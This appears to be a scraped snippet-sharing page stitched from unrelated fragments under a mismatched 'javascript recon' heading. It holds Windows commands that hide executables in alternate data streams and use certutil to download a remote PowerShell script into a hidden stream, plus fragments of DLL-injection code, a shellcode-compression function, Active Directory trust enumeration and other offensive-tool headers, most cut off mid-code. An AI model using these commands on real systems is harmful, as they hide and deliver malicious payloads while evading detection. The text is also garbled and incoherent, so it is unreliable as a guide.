joshualouden

Description

This is a simple guide to perform javascript recon in the bugbounty

Steps

The first step is to collect possibly several javascript files (more files = more paths,parameters -> more vulns)

Add content to ADS

type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"

extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe

findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe

certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt

makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab

Tunneling Ethernet Over SSH With Socat and Tap Devices

There are circumstances where one wants to attach the local machine to the same layer 2 ethernet segment, which a remote machine is connected to, with the only available transport being SSH.

While this solution has quite some shortcomings and should not be used to replace a real VPN, it can be beneficial e.g. for debugging network issues remotely.

	#!/bin/bash

	set -e

	OS=$(awk -F= '/^ID=/{print tolower($2)}' /etc/os-release \| tr -d '"')
	echo "Detected OS: $OS"
	# TRICKEST_DATA_DIR - do not change this one, it it still not configurable, coming soon
	TRICKEST_DATA_DIR="/data"
	# TRICKEST_JOB_LOGS_PATH - do not change this one, it it still not configurable, coming soon
	TRICKEST_JOB_LOGS_PATH="${TRICKEST_DATA_DIR}/storage/container"

	# You don't need Fog in Ruby or some other library to upload to S3 -- shell works perfectly fine
	# This is how I upload my new Sol Trader builds (http://soltrader.net)
	# Based on a modified script from here: http://tmont.com/blargh/2014/1/uploading-to-s3-in-bash

	# ====================================================================================
	# Aug 25, 2016 sh1n0b1
	# Modified this script to support AWS session token
	# More work will be done on this.
	#
	# S3KEY="ASIAJLFN####################"

	#include
	#include

	// Source:
	// http://www.emoticode.net/embed/c-plus-plus/win32-dll-injection-with-writeprocessmemory-and-opcode-patching.html
	// No original Copy of page available

	/***************************************************************************************************/
	// Function:
	// Inject

	<#
	https://raw.githubusercontent.com/rasta-mouse/TikiTorch/master/Get-CompressedShellcode.ps1
	#>

	function Get-CompressedShellcode
	{
	[CmdletBinding()]
	Param([String]$inFile,[String]$outFile)
	$byteArray = [System.IO.File]::ReadAllBytes($inFile)
	Write-Verbose "Get-CompressedByteArray"

	Retrieves all of the trust relationships for this domain - Does not Grab Forest Trusts

	([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()


	Grab Forest Trusts.

	([System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()).GetAllTrustRelationships()

	#!/usr/bin/env python
	# Rulz.py
	# Author: Nick Landers (@monoxgas) - Silent Break Security

	import os
	import sys
	import argparse
	import re
	import binascii
	import codecs

	import frida
	import sys

	def on_message(message, data):
	if message['type'] == 'send':
	print(message['payload'])
	elif message['type'] == 'error':
	print(message['stack'])
	else:
	print(message)